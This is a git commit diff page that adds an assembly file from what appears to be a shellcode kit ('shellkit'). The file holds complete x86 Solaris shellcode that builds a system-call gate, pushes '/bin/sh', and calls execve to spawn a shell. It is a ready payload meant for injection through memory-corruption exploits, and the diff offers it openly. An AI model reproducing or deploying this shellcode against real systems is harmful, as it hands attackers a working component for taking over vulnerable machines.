diff options
| author | Root THC | 2026-02-24 12:42:47 +0000 |
|---|---|---|
| committer | Root THC | 2026-02-24 12:42:47 +0000 |
| commit | c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch) | |
| tree | aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/x86_solaris/execve.s | |
| parent | 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff) | |
initial
Diffstat (limited to 'other/shellkit/x86_solaris/execve.s')
| -rw-r--r-- | other/shellkit/x86_solaris/execve.s | 32 |
1 files changed, 32 insertions, 0 deletions
diff --git a/other/shellkit/x86_solaris/execve.s b/other/shellkit/x86_solaris/execve.s new file mode 100644 index 0000000..428a2fe --- /dev/null +++ b/other/shellkit/x86_solaris/execve.s | |||
| @@ -0,0 +1,32 @@ | |||
| 1 | /* x86/solaris execve /bin/sh shellcode | ||
| 2 | * | ||
| 3 | * lorian / teso | ||
| 4 | */ | ||
| 5 | |||
| 6 | .globl cbegin | ||
| 7 | .globl cend | ||
| 8 | |||
| 9 | cbegin: | ||
| 10 | movl $0x3cfff8ff, %eax | ||
| 11 | notl %eax | ||
| 12 | pushl %eax | ||
| 13 | xorl %eax, %eax | ||
| 14 | cdq | ||
| 15 | movb $0x9a, %al | ||
| 16 | pushl %eax | ||
| 17 | movl %esp, %edi | ||
| 18 | |||
| 19 | movb $0x3b, %al | ||
| 20 | pushl %edx | ||
| 21 | push $0x68732F6E | ||
| 22 | push $0x69622F2F | ||
| 23 | movl %esp, %ebx | ||
| 24 | pushl %edx | ||
| 25 | pushl %ebx | ||
| 26 | movl %esp, %ecx | ||
| 27 | pushl %edx | ||
| 28 | pushl %ecx | ||
| 29 | pushl %ebx | ||
| 30 | call *%edi | ||
| 31 | |||
| 32 | cend: | ||